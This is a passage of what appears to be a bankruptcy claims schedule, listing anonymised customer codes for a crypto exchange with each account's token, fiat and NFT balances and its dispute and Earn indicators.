| 07331051 | | CUSDT[1], DOGE[3], ETH[0], USD[0.00] | Yes | |
| 07331052 | | GRT[4.27411996], USD[0.00] | | |
| 07331053 | | CUSDT[4], TRX[2], USD[0.01] | | |
| 07331054 | | AUD[3.89], BRZ[86.80445284], CAD[3.76], DOGE[5], EUR[2.52], GBP[2.15], SGD[4.05], TRX[1], USD[0.35] | | |
| 07331055 | | USD[0.01] | | |
| 07331056 | | BRZ[1], CUSDT[1], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07331058 | | AAVE[.00001016], BF_POINT[300], BRZ[1], CUSDT[3], DOGE[1], ETHW[.13483388], GRT[.00560142], LTC[.00001523], NFT (334929442646806660/Miami Ticket Stub #546)[1], SHIB[4], TRX[11], USD[187.43] | Yes | |
| 07331059 | | USD[0.92] | | |
| 07331060 | | USD[0.92] | | |
| 07331061 | | USD[10.00] | | |
| 07331062 | | USD[10.00] | | |
| 07331063 | | BRZ[2], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07331064 | | BRZ[1], CUSDT[2], TRX[1.11580705], USD[0.01] | | |
| 07331065 | | BRZ[1], DOGE[1], TRX[1], USD[0.01], USDT[1.07975077] | Yes | |
| 07331066 | | USD[10.00] | | |
| 07331067 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331068 | | TRX[1], USD[0.00] | Yes | |
| 07331069 | | CUSDT[1], DOGE[8.30969576], ETH[0.00159113], ETHW[0.00159113], TRX[1], USD[0.00] | | |
| 07331070 | | USD[41.52] | | |
| 07331071 | | BRZ[1], DOGE[773.19277689], TRX[3], USD[0.00] | | |
| 07331072 | | USD[10.00] | | |
| 07331073 | | ETH[.00538208], ETHW[.00538208], TRX[1], USD[0.00] | | |
| 07331074 | | USD[10.00] | | |
| 07331075 | | DOGE[10963.56026314], USD[10.00] | | |
| 07331076 | | NFT (465489230441699061/Coachella x FTX Weekend 2 #5869)[1], SOL[.10043134], USD[0.00] | Yes | |
| 07331077 | | BTC[0], CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07331078 | | BAT[6], BRZ[11], CUSDT[31], DOGE[13], SUSHI[1.58081813], TRX[31], USD[0.00], USDT[0] | | |
| 07331080 | | USD[10.00] | | |
| 07331081 | | USD[10.00] | | |
| 07331083 | | BTC[0], DOGE[0], USD[0.48] | | |
| 07331084 | | BTC[0], CUSDT[5], NFT (290601064257568386/Untitled (Blessed) #12)[1], NFT (309812180175756932/Punk Line #9)[1], NFT (330134560358886973/Settler #157)[1], NFT (387655059326086615/Solana Penguin #1082)[1], NFT (422588521718505199/Chitto #7)[1], NFT (511633843829120627/Mad Girl Series)[1], SHIB[1], SOL[.53207211], TRX[1], USD[0.00] | Yes | |
| 07331085 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07331086 | | USD[0.01] | | |
| 07331087 | | USD[10.00] | | |
| 07331088 | | USD[10.00] | | |
| 07331091 | | USD[10.00] | | |
| 07331092 | | USD[10.00] | | |
| 07331093 | | USD[0.12] | | |
| 07331094 | | USD[10.00] | | |
| 07331095 | | BTC[.00078584], DOGE[3197.83926893], USD[0.00] | | |
| 07331096 | | USD[10.00] | | |
| 07331097 | Contingent, Disputed | ETHW[.00098524], USD[0.01] | | |
| 07331098 | | BRZ[5], CUSDT[18], DOGE[1], GRT[1], TRX[15], USD[0.00], USDT[3] | | |
| 07331100 | | BAT[1], CUSDT[1], DAI[9.92225772], DOGE[7173.46797744], TRX[3], USD[0.00] | | |
| 07331101 | | BRZ[1], CUSDT[5], DOGE[46.35160085], TRX[4], USD[0.01] | Yes | |
| 07331102 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07331103 | | BTC[.00104878], CUSDT[1], ETH[.0001134], ETHW[.0001134], LINK[4.30765626], LTC[.05700418], TRX[1], USD[0.00], USDT[1] | | |
| 07331104 | | CUSDT[1], DOGE[66.41907682], TRX[3], USD[0.00] | | |
| 07331105 | | CUSDT[1], TRX[101.69598961], USD[0.00] | Yes | |
| 07331106 | | USD[10.00] | | |
| 07331107 | | USD[10.00] | | |
| 07331108 | | DOGE[2], USD[0.00] | | |
| 07331109 | | CUSDT[2], DOGE[4], TRX[1], USD[0.00] | | |
| 07331110 | | USD[10.00] | | |
| 07331112 | | USD[10.00] | | |
| 07331113 | | USD[10.00] | | |
| 07331114 | | CUSDT[1], DOGE[.00001102], USD[0.01] | | |
| 07331115 | | USD[10.00] | | |
| 07331117 | | USD[10.00] | | |
| 07331118 | | BRZ[.00000503], CUSDT[2], DOGE[0], GBP[0.00], GRT[0], LTC[0], USD[0.00], USDT[0.00000001] | | |
| 07331119 | | CUSDT[1], DOGE[1239.70034097], ETH[.03167022], ETHW[.0312735], USD[0.00] | Yes | |
| 07331120 | | USD[0.95] | | |
| 07331121 | | CUSDT[1], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07331122 | | USD[10.00] | | |
| 07331123 | | USD[10.00] | | |
| 07331124 | | BTC[0], CUSDT[3], USD[0.00] | Yes | |
| 07331125 | | DOGE[33.36425643], TRX[1], USD[0.00] | | |
| 07331126 | | CUSDT[4], DOGE[26.11330367], ETH[.00914398], ETHW[.00914398], TRX[3], USD[0.01] | | |
| 07331127 | | CUSDT[3], DOGE[764.82669686], TRX[1], USD[0.00] | | |
| 07331128 | | BAT[1], BRZ[2], CUSDT[9], DOGE[4], ETH[.05199311], ETHW[.05199311], GRT[1], TRX[6], USD[0.01] | | |
| 07331129 | | BRZ[2], CUSDT[16], TRX[5], USD[0.07] | Yes | |
| 07331130 | | BRZ[1], CUSDT[6], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07331131 | | USD[10.00] | | |
| 07331132 | | BAT[1], BRZ[1], CUSDT[1], DOGE[2524.50741306], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331134 | | BRZ[1], CUSDT[1], GRT[1], USD[0.00] | | |
| 07331135 | | CUSDT[1], DOGE[2236.92611626], USD[0.00] | | |
| 07331136 | | USD[10.00] | | |
| 07331137 | | BTC[.00000053], USD[0.02] | | |
| 07331139 | | USD[10.00] | | |
| 07331141 | | DOGE[1], USD[27.61] | Yes | |
| 07331142 | | BAT[1.01655549], BRZ[1], CUSDT[3], DOGE[213.54533296], USD[0.00], USDT[0] | Yes | |
| 07331143 | | CUSDT[5], DOGE[1222.43494727], GRT[0], SHIB[383164.00578514], TRX[4], USD[0.01] | Yes | |
| 07331144 | | USD[10.00] | | |
| 07331145 | | USD[10.00] | | |
| 07331146 | | USD[10.00] | | |
| 07331147 | | USD[10.00] | | |
| 07331148 | | BCH[.00369658], CUSDT[1], DOGE[140.63457253], ETH[.00542635], ETHW[.00542635], LINK[.24770799], LTC[.00419888], TRX[1], USD[0.00] | | |
| 07331149 | | USD[10.00] | | |
| 07331150 | | USD[10.00] | | |
| 07331152 | | USD[10.00] | | |
| 07331153 | | BTC[.00029104], CUSDT[7], DOGE[1237.57655014], KSHIB[216.24791699], SHIB[215520.24137931], SOL[1.0586668], USD[0.33] | | |
| 07331154 | | BRZ[1], CUSDT[5], DOGE[3277.0397324], LTC[.41176685], SHIB[369503.94732147], USD[0.00] | | |
| 07331155 | | DOGE[0], USD[0.10], USDT[0.00026986] | | |
| 07331156 | | CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07331157 | | USD[10.00] | | |
| 07331158 | | DOGE[1.00002832], USD[0.00] | | |
| 07331159 | | BAT[2], BRZ[7], CUSDT[14], DAI[0], DOGE[1], ETH[0], GRT[1], KSHIB[35539.74060038], NFT (296607774623004071/GalaxyKoalas # 324)[1], NFT (301995474511822182/GalaxyKoalas # 332)[1], NFT (391857820640268793/GalaxyKoalas # 173)[1], NFT (483600180216855233/Red Panda #6390)[1], NFT (491138152400068232/GalaxyKoalas # 52)[1], NFT (575593663377134587/Lunarian #6269)[1], SOL[0], TRX[12], USD[0.00], USDT[2] | | |
| 07331160 | | BRZ[1], BTC[.00760816], CUSDT[1], USD[0.03] | | |
| 07331161 | | USD[10.00] | | |
| 07331162 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07331163 | | USD[10.00] | | |
| 07331164 | | DOGE[0.0000211], SHIB[1], USD[0.01] | | |
| 07331165 | | USD[0.01], USDT[0] | | |
| 07331166 | | DOGE[0], USD[0.02] | Yes | |
| 07331167 | | CUSDT[3], DOGE[.00003929], USD[52.89] | | |
| 07331168 | | BRZ[2], CUSDT[15], DOGE[3449.84243633], ETH[.14060116], ETHW[.13962768], GRT[47.6737816], LTC[1.07105281], MKR[.00738033], SHIB[24772328.75176907], SOL[3.38067701], TRX[314.99634062], USD[455.13] | Yes | |
| 07331169 | | USD[10.00] | | |
| 07331170 | | DOGE[0], TRX[4], USD[0.00] | | |
| 07331171 | | CUSDT[2], USD[0.01] | | |
| 07331172 | | USD[10.00] | | |
| 07331173 | | BRZ[1], BTC[.00777231], CUSDT[960.0083766], DOGE[3890.84463527], ETH[.13952769], ETHW[.13952769], GRT[118.42848947], LINK[.9985825], LTC[.0733722], SOL[5.03082753], SUSHI[.54469898], TRX[4], UNI[.10477256], USD[0.01], USDT[.51140924] | | |
| 07331174 | | USD[0.62] | | |
| 07331175 | | USD[10.00] | | |
| 07331176 | | BCH[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[.00043886], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07331177 | | USD[10.00] | | |
| 07331179 | | CUSDT[3], DOGE[.5226382], ETH[.00119658], ETHW[.0011829], NFT (297280380779885773/Ancient Civilization #50)[1], NFT (318794578622109401/Ancient Civilization #29)[1], NFT (450022655943284730/Ancient Civilization #30)[1], NFT (492432904644894701/Ancient Civilization #25)[1], NFT (528077870013311669/Ancient Civilization #40)[1], NFT (559980655059284675/Cryptographic zombie #3)[1], USD[4.97] | Yes | |
| 07331180 | | CUSDT[2], DOGE[483.89484622], USD[0.69] | | |
| 07331181 | | USD[10.00] | | |
| 07331182 | | CUSDT[1], DOGE[23877.1441269 7], TRX[1], USD[0.00] | Yes | |
| 07331184 | | USD[10.00] | | |
| 07331185 | | CUSDT[1], DOGE[0], TRX[4.92480082], USD[0.73] | Yes | |
| 07331186 | | BRZ[1], DOGE[2], SHIB[1973976.82120668], USD[0.00], USDT[1.08386062] | Yes | |
| 07331187 | | DOGE[33.9104], USD[0.02] | | |
| 07331188 | | DOGE[.00008819], USD[0.50] | | |
| 07331189 | | USD[0.01] | | |
| 07331190 | | CUSDT[5], TRX[2], USD[0.81] | | |
| 07331191 | | USD[10.00] | | |
| 07331192 | | CUSDT[1], SHIB[378.285299], USD[0.00] | Yes | |
| 07331193 | | USD[0.13] | | |
| 07331196 | | DOGE[173.48464201], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331197 | | USD[10.00] | | |
| 07331198 | | USD[0.00] | | |
| 07331199 | | TRX[.00000315], USD[0.00], USDT[0] | | |
| 07331201 | | USD[0.09], USDT[0] | | |
| 07331202 | | USD[10.00] | | |
| 07331203 | | USD[10.00] | | |
| 07331204 | | BTC[.00007762], CUSDT[3.04553118], DOGE[368.26737804], KSHIB[137.94684604], SHIB[149975.78843858], SUSHI[1.86890842], USD[0.00], USDT[0] | Yes | |
| 07331206 | | USD[10.00] | | |
| 07331207 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07331208 | | TRX[1], USD[0.01] | | |
| 07331209 | | USD[10.00] | | |
| 07331210 | | USD[10.00] | | |
| 07331211 | | CUSDT[3], USD[0.00], USDT[0] | | |
| 07331212 | | DOGE[0], USD[0.00] | | |
| 07331213 | | DOGE[.92125889], USD[0.00] | | |
| 07331215 | | USD[10.00] | | |
| 07331216 | | CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.01] | | |
| 07331217 | | CUSDT[4], DOGE[1724.54168576], SHIB[2], USD[0.21] | | |
| 07331218 | | USD[10.00] | | |
| 07331219 | | USD[10.00] | | |
| 07331220 | | USD[10.00] | | |
| 07331221 | | TRX[1], USD[0.01] | | |
| 07331222 | | USD[0.00] | | |
| 07331223 | | CUSDT[3], DOGE[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07331225 | | BF_POINT[200], SOL[1.19823914], USD[0.00] | Yes | |
| 07331226 | | USD[0.01] | | |
| 07331227 | | BTC[0], DOGE[900.94837300], SHIB[1], TRX[2.41047548], USD[0.00] | Yes | |
| 07331228 | | DOGE[44.04382184], USD[12.00] | | |
| 07331229 | | CUSDT[7], DOGE[229.05323581], ETH[.00554527], ETHW[.00554527], TRX[155.25862955], USD[0.00] | | |
| 07331230 | | DOGE[0], ETH[0], SHIB[3397.80875244], USD[0.00] | | |
| 07331232 | | BRZ[2], BTC[.00036234], CUSDT[1], DOGE[32.05116358], USD[2.15], USDT[0] | Yes | |
| 07331233 | | CUSDT[2], DOGE[1.01919041], TRX[410.86287543], USD[0.01] | Yes | |
| 07331234 | | BTC[0], DOGE[2], ETH[0], USD[0.00] | | |
| 07331236 | | DOGE[170.85027695], USD[0.00] | | |
| 07331237 | | DOGE[8991.81155565], SHIB[4487152.59240681], TRX[0], USD[0.00], USDT[0] | | |
| 07331238 | | SHIB[2], USD[0.30] | Yes | |
| 07331239 | | BRZ[2], CUSDT[23], ETH[.00000124], ETHW[.00000124], TRX[2], USD[0.00] | Yes | |
| 07331240 | | GRT[2172.39353868], USD[0.72], USDT[0] | | |
| 07331242 | | USD[10.00] | | |
| 07331244 | | USD[10.03] | | |
| 07331245 | | CUSDT[2], DOGE[26859.55131357], SHIB[1], TRX[1], USD[0.03] | | |
| 07331246 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07331247 | | USD[10.00] | | |
| 07331248 | | DOGE[0], GRT[1.00498957], USD[0.00] | Yes | |
| 07331249 | | USD[10.00] | | |
| 07331250 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[41.47660630], LINK[1.3237326], MATIC[0], SHIB[4], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07331251 | | USD[10.00] | | |
| 07331252 | | USD[10.00] | | |
| 07331253 | | CUSDT[1], DOGE[1635.90908897], USD[10.00] | | |
| 07331254 | | USD[10.00] | | |
| 07331255 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07331256 | | USD[10.00] | | |
| 07331257 | | CUSDT[6], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07331258 | | USD[10.00] | | |
| 07331259 | | USD[10.00] | | |
| 07331260 | | USD[10.00] | | |
| 07331261 | | CUSDT[1], USD[0.00] | Yes | |
| 07331262 | | BAT[17.01295789], CUSDT[1], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331263 | | USD[10.00] | | |
| 07331264 | | BTC[.00002476], DOGE[170.98837958], SHIB[163398.69281045], SOL[.0059999], TRX[12.31764221], USD[60.00] | | |
| 07331265 | | USD[10.00] | | |
| 07331266 | | CUSDT[1], GRT[4.1341386], USD[0.00] | | |
| 07331267 | | ETH[.00001039], ETHW[.00001039], USD[0.00] | Yes | |
| 07331268 | | USD[10.00] | | |
| 07331270 | | BRZ[0], BTC[0], DOGE[1], USD[0.00], USDT[0.00000001] | | |
| 07331271 | | USD[0.19] | | |
| 07331273 | | USD[10.00] | | |
| 07331274 | | USD[10.00] | | |
| 07331275 | | USD[10.00] | | |
| 07331276 | | BRZ[0], BTC[0.10571279], LINK[11.01816813], USD[1.05], USDT[0.00000158] | | |
| 07331277 | | USD[10.00] | | |
| 07331278 | | USD[10.00] | | |
| 07331279 | | USD[0.03] | | |
| 07331280 | | CUSDT[1], ETH[0.00536132], ETHW[0.00536132], USD[0.01] | | |
| 07331281 | | SHIB[4518540.09107079], USD[0.00], USDT[0.00000001] | Yes | |
| 07331282 | | USD[10.00] | | |
| 07331283 | | USD[10.00] | | |
| 07331284 | | DOGE[1], USD[0.00] | Yes | |
| 07331288 | | USD[0.00] | Yes | |
| 07331289 | | BRZ[1], CUSDT[8], TRX[357.709135], USD[54.31] | Yes | |
| 07331292 | | CUSDT[518.67477034], SHIB[1098657.28292997], USD[0.27] | Yes | |
| 07331293 | | USD[10.00] | | |
| 07331294 | | USD[12.00] | | |
| 07331295 | | DOGE[1.00075325], USD[46.41] | | |
| 07331297 | | DOGE[453.56135239], SOL[1.72301381], USD[10.00] | | |
| 07331298 | | DOGE[.388], USD[1.89], USDT[.007944] | | |
| 07331299 | | USD[10.00] | | |
| 07331300 | | BTC[0], NFT[341677243644092979/PixelRabbits #1][1], NFT[439334711882999680/Entrance Voucher #17965][1], NFT[494835972192909191/Humpty Dumpty #1637][1], USD[0.00] | | |
| 07331301 | | USD[0.01] | | |
| 07331302 | | CUSDT[1], DOGE[1658.04742532], TRX[1], USD[0.43] | | |
| 07331303 | | CUSDT[3], TRX[2], USD[94.82] | | |
| 07331304 | | USD[10.00] | | |
| 07331305 | | BRZ[1], CUSDT[21], DOGE[975.9057601], TRX[3], USD[0.00] | Yes | |
| 07331306 | | USD[10.00] | | |
| 07331307 | | CUSDT[1], DOGE[71.0064695], USD[0.30] | | |
| 07331308 | | DOGE[484.50922165], USD[34.57] | | |
| 07331309 | | USD[10.00] | | |
| 07331311 | | CUSDT[1], DOGE[2.00000154], USD[0.01] | | |
| 07331312 | | NFT[298047860598233539/Entrance Voucher #3087][1], USD[0.00] | Yes | |
| 07331313 | | DOGE[113.89033809], USD[10.00] | | |
| 07331314 | | BF_POINT[500], NFT[411642705695867569/Australia Ticket Stub #1420][1], SHIB[1], SUSHI[.0000058], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07331315 | | TRX[2], USD[0.01] | Yes | |
| 07331316 | | USD[0.00] | Yes | |
| 07331318 | | DOGE[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07331319 | | BRZ[1], CUSDT[2], DOGE[73.08730605], SHIB[2], TRX[113.17257516], USD[104.28] | Yes | |
| 07331320 | | BTC[0], DOGE[3.00017517], ETH[0], SOL[1.35390887], TRX[4], USD[10.26] | Yes | |
| 07331321 | | DOGE[.00953161], USD[0.00] | | |
| 07331322 | | USD[0.00], USDT[9.9470557] | | |
| 07331323 | | BTC[0], USD[0.84], USDT[0] | | |
| 07331324 | | CUSDT[5], DAI[108.28342233], DOGE[238.72173224], MATIC[28.24815267], SOL[1.43505399], TRX[517.32811815], USD[0.00] | Yes | |
| 07331325 | | USD[10.00] | | |
| 07331326 | | ETH[.00476064], ETHW[.00470592], USD[0.00] | Yes | |
| 07331327 | | BTC[.00017438], USD[0.00] | | |
| 07331328 | | DOGE[1], USD[0.01] | | |
| 07331330 | | USD[0.00], USDT[0] | | |
| 07331331 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331332 | | USD[10.00] | | |
| 07331333 | | USD[0.01] | Yes | |
| 07331334 | | USD[10.00] | | |
| 07331336 | | USD[10.00] | | |
| 07331337 | | AUD[28.30], CUSDT[11], DAI[21.20003776], DOGE[2], KSHIB[275.48899743], SHIB[40744092.5524197], SUSHI[59.3634897], TRX[1], USD[0.00] | Yes | |
| 07331339 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07331340 | | USD[10.00] | | |
| 07331341 | | CUSDT[1], DOGE[121.72301788], USD[0.00] | | |
| 07331342 | | DOGE[0], USD[0.00] | | |
| 07331343 | | USD[10.00] | | |
| 07331344 | | USD[10.00] | | |
| 07331345 | | DOGE[1.05311251], USD[0.00] | Yes | |
| 07331346 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07331348 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07331349 | | USD[10.00] | | |
| 07331350 | | BRZ[2], DOGE[2769.07783334], LTC[.52795089], TRX[1], USD[0.00] | Yes | |
| 07331351 | | ETH[.00000001], ETHW[.00000001], USD[0.00] | Yes | |
| 07331352 | | USD[10.00] | | |
| 07331353 | | USD[10.00] | | |
| 07331354 | | DOGE[2159.17539666], USD[0.00] | Yes | |
| 07331355 | | USD[0.00] | | |
| 07331356 | | USD[10.00] | | |
| 07331357 | | CUSDT[3], DOGE[0], TRX[148.16983688], USD[0.00] | Yes | |
| 07331358 | | USD[10.00] | | |
| 07331359 | | TRX[1], USD[0.00] | | |
| 07331360 | | BTC[.00005347], CUSDT[1], DOGE[.00754248], TRX[.00093003], USD[0.01] | Yes | |
| 07331361 | | USD[10.00] | | |
| 07331362 | | BTC[0.00000108], USD[0.78] | | |
| 07331363 | | BRZ[8.85372534], CUSDT[443.79297876], GRT[2.07884748], TRX[28.77460703], USD[0.00], USDT[0.00577801] | Yes | |
| 07331364 | | USD[10.00] | | |
| 07331365 | | USD[10.00] | | |
| 07331366 | | CUSDT[1], DOGE[1], USD[10.00] | | |
| 07331367 | | USD[0.27] | | |
| 07331368 | | DOGE[113.6437763], USD[10.00] | | |
| 07331369 | | DOGE[16.40892134], USD[0.00] | | |
| 07331370 | | DOGE[4.05213569], ETH[.00000011], ETHW[.00000011], SOL[.00000017], USD[8.32] | Yes | |
| 07331371 | | BRZ[1], GRT[4], USD[0.00], USDT[1] | | |
| 07331372 | | GRT[5.23424923], USD[0.00] | Yes | |
| 07331373 | | USD[0.15] | | |
| 07331374 | | CUSDT[1], DOGE[.13851286], ETH[.03020689], ETHW[.03020689], LINK[0.21696406], LTC[.19297925], TRX[1], USD[0.30] | | |
| 07331375 | | BRZ[2], CUSDT[4], TRX[2], USD[0.01], USDT[1.11030948] | Yes | |
| 07331377 | | USD[10.00] | | |
| 07331378 | | TRX[2], USD[0.00] | | |
| 07331379 | | USD[10.00] | | |
| 07331380 | | DOGE[26.56946775], USD[0.00] | | |
| 07331381 | | BTC[.00000108], USD[0.00] | Yes | |
| 07331382 | | USD[10.00] | | |
| 07331383 | | BTC[.00003426], DOGE[1.00032737], ETH[.00416132], ETHW[.00416132], TRX[12.66314925], USD[0.00] | | |
| 07331384 | | DOGE[0], USD[0.01] | | |
| 07331385 | | DOGE[36.77759832], USD[0.00] | | |
| 07331388 | | USD[0.00] | | |
| 07331389 | | BAT[2], BRZ[1], CUSDT[10], DOGE[320.17565696], GRT[2], TRX[4], USD[0.00] | | |
| 07331390 | | USD[0.00] | Yes | |
| 07331391 | | USD[10.00] | | |
| 07331392 | | USD[10.00] | | |
| 07331393 | | CUSDT[1], DOGE[1039.38936929], USD[40.00] | | |
| 07331394 | | MATIC[8.5], USD[0.01] | | |
| 07331396 | | USD[10.00] | | |
| 07331397 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331398 | | USD[0.00] | | |
| 07331400 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07331401 | | AAVE[0], BF_POINT[300], BTC[0.00000001], DOGE[0], ETH[0], ETHW[0], GRT[0], MATIC[0], NEAR[0], NFT (424160445800320572/Zeus Art #2)[1], SHIB[1], SOL[0.00000002], USD[0.01], USDT[0] | Yes | |
| 07331402 | | BCH[0], USD[0.00] | Yes | |
| 07331403 | | USD[10.00] | | |
| 07331404 | | USD[10.00] | | |
| 07331405 | | BRZ[1], DOGE[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07331406 | | CUSDT[4], USD[0.01] | | |
| 07331407 | | CUSDT[946.53407617], DOGE[1], USD[0.00] | | |
| 07331408 | | DOGE[25.09369492], USD[0.00] | | |
| 07331409 | | BAT[29.73392911], BRZ[45.258505], CUSDT[307.48559513], DOGE[120.51920651], GBP[4.49], GRT[159.65092352], KSHIB[579.64788626], MATIC[18.71542948], NFT (333452405453636090/Metaverse Masks #12)[1], NFT (465479060683368545/Game #2)[1], NFT (501460463525979289/DRIP NFT)[1], SHIB[649371.45312226], SOL[1.13234049], SUSHI[.50609956], TRX[651.95261573], USD[0.76] | Yes | |
| 07331410 | | USD[10.00] | | |
| 07331411 | | USD[10.00] | | |
| 07331412 | | BAT[1], CUSDT[2], DOGE[324.10802942], GRT[1], TRX[75.1812997], USD[0.46], USDT[1] | | |
| 07331413 | | NFT (443791686292962641/Bahrain Ticket Stub #1808)[1] | | |
| 07331414 | | USD[10.00] | | |
| 07331415 | | USD[10.00] | | |
| 07331416 | | CUSDT[4], DOGE[13.04343394], GRT[1], USD[0.01] | | |
| 07331417 | | USD[10.00] | | |
| 07331418 | | BTC[0], CUSDT[2], DOGE[1.00068628], ETH[0], SUSHI[0], TRX[2], USD[0.00], USDT[1.09019405] | Yes | |
| 07331419 | | CUSDT[1.00099085], DOGE[.00000934], TRX[1], USD[0.01] | | |
| 07331421 | | DOGE[0], USD[0.01] | | |
| 07331423 | | BAT[349.2234468], BRZ[1], BTC[2.07981532], CUSDT[1], DOGE[44530.40946662], ETH[1.61038961], ETHW[2.74124117], GRT[1.00321271], LINK[80.15002802], TRX[38164.95654539], USD[0.00], USDT[0.00000400] | Yes | |
| 07331424 | | USD[10.00] | | |
| 07331425 | | USD[10.00] | | |
| 07331426 | | DOGE[31.52898298], USD[0.00] | Yes | |
| 07331428 | | USD[10.00] | | |
| 07331429 | | USD[10.00] | | |
| 07331430 | | BAT[1.0165555], BRZ[8.7864544], BTC[0], CUSDT[72.63552937], DAI[0], DOGE[0], GRT[5.48989585], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0.00000519], TRX[1], USD[0.00] | Yes | |
| 07331431 | | BAT[.00008143], CUSDT[1], DOGE[.00000001], TRX[.71718961], USD[1.46] | | |
| 07331432 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07331433 | | CUSDT[1], DOGE[2370.23721571], USD[10.00] | | |
| 07331434 | | BTC[0], CUSDT[2], ETH[0], ETHW[0], GRT[0], NFT (481787851592680260/Astral Apes #1050)[1], SOL[0.36747954], TRX[1.32751261], USD[0.00] | Yes | |
| 07331435 | | CUSDT[2], ETH[0], LINK[0], SOL[1.07184689], TRX[0], USD[0.00] | | |
| 07331437 | | USD[10.00] | | |
| 07331438 | | USD[10.00] | | |
| 07331440 | | USD[10.00] | | |
| 07331441 | | TRX[1], USD[43.83] | | |
| 07331442 | | BF_POINT[100], DOGE[1], ETH[.00014071], GRT[1.27695527], LINK[.04300019], NFT (344358593949476570/SBF Hair & Signature #3 #93)[1], NFT (439855482716211445/Bahrain Ticket Stub #1966)[1], NFT (478861872182573258/SBF Hair & Signature #2 #117)[1], NFT (558294601540135032/Romeo #1234)[1], NFT (571912649535808761/SBF Hair & Signature #1 #105)[1], SUSHI[.19721991], UNI[.05350866], USD[0.00], YFI[.00003276] | Yes | |
| 07331443 | | USD[10.00] | | |
| 07331444 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07331445 | | USD[10.00] | | |
| 07331446 | | CUSDT[1], SHIB[4], USD[9093.99] | | |
| 07331447 | | BRZ[3], BTC[.01204984], CUSDT[13], DAI[.00001496], DOGE[1798.40570022], ETH[.14409629], ETHW[.14319423], LTC[1.47691282], SOL[7.55772985], TRX[2490.77100736], USD[10.04] | Yes | |
| 07331448 | | BTC[0.00884600], DOGE[.346], ETH[.001818], ETHW[.001818], GRT[0], KSHIB[0], LTC[.7656714], MATIC[0.04477433], SOL[8.35637000], TRX[0.95242487], USD[0.44], USDT[0.02776065] | | |
| 07331449 | | USD[10.00] | | |
| 07331450 | | DOGE[47.55816691], USD[10.00] | | |
| 07331451 | | USD[20.00] | | |
| 07331452 | | BTC[0], CUSDT[5], USD[0.00] | Yes | |
| 07331454 | | DOGE[1], USD[25.86] | | |
| 07331455 | | BRZ[0], BTC[0.02848768], DAI[0], DOGE[0], ETH[0], UNI[2.46925880], USD[0.14], USDT[0.00000012] | Yes | |
| 07331456 | | USD[0.01] | | |
| 07331457 | | CUSDT[1], USD[0.00] | | |
| 07331458 | | BRZ[1], BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.01], USDT[2] | | |
| 07331459 | | USD[10.00] | | |
| 07331460 | | CUSDT[3], DOGE[5227.93582956], TRX[2], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331461 | | BRZ[1], BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], TRX[4], UNI[0], USD[0.00], USDT[0] | | |
| 07331463 | | BAT[1], BRZ[1], BTC[0], CUSDT[4], DOGE[0], GRT[1], TRX[1], USD[0.00], USDT[2] | | |
| 07331464 | | USD[10.00] | | |
| 07331465 | | BTC[.00022031], USD[0.00] | | |
| 07331466 | | BRZ[1], CUSDT[2], DOGE[3], USD[0.00] | Yes | |
| 07331467 | | BTC[.00099771], DOGE[207.0135765], ETH[.00258672], ETHW[.00258672], LINK[2.00000794], SHIB[2], USD[0.00] | | |
